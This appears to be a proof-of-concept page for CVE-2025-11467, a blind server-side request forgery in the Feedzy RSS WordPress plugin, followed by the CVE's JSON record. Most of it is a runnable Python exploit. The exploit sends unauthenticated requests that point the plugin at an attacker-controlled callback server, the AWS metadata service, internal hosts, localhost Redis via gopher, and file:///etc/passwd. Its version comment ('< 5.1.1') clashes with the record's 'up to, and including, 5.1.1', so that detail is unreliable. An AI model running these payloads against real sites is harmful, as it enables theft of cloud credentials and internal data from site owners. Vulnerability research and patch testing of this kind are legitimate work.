CVE-2025-11467

import requests import sys # CVE-2025-11467 PoC - Blind SSRF in Feedzy RSS Plugin # Target: WordPress site with Feedzy plugin < 5.1.1 def test_ssrf(target_url, attacker_server): """ Test for Blind SSRF vulnerability in feedzy_lazy_load function target_url: Target WordPress site URL attacker_server: Attacker-controlled server to receive callbacks """ # Vulnerable endpoint parameters params = { 'feedzy_lazy_load': '1', 'url': f'http://{attacker_server}/test', # SSRF payload 'security_nonce': 'any_value' # May be missing validation } # Alternative payloads for internal service probing payloads = [ # AWS metadata service 'http://169.254.169.254/latest/meta-data/', # Internal network scanning 'http://192.168.1.1:80/', # Localhost probing 'http://127.0.0.1:6379/', # File protocol (LFI) 'file:///etc/passwd', # Gopher protocol for Redis 'gopher://127.0.0.1:6379/_INFO' ] print(f'[*] Testing target: {target_url}') print(f'[*] Sending blind SSRF payloads...') for payload in payloads: params['url'] = payload try: response = requests.get(target_url, params=params, timeout=10) print(f'[+] Payload sent: {payload}') except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') print('[*] Check attacker server logs for incoming requests') if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <attacker_server>') sys.exit(1) test_ssrf(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2025-11467", "sourceIdentifier": "[email protected]", "published": "2025-12-11T03:15:57.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 5.1.1 via the feedzy_lazy_load function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/5.1.0/includes/abstract/feedzy-rss-feeds-admin-abstract.php#L551", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5754dce7-6b47-4490-a04a-7eabfded0720?source=cve", "source": "[email protected]"}]}}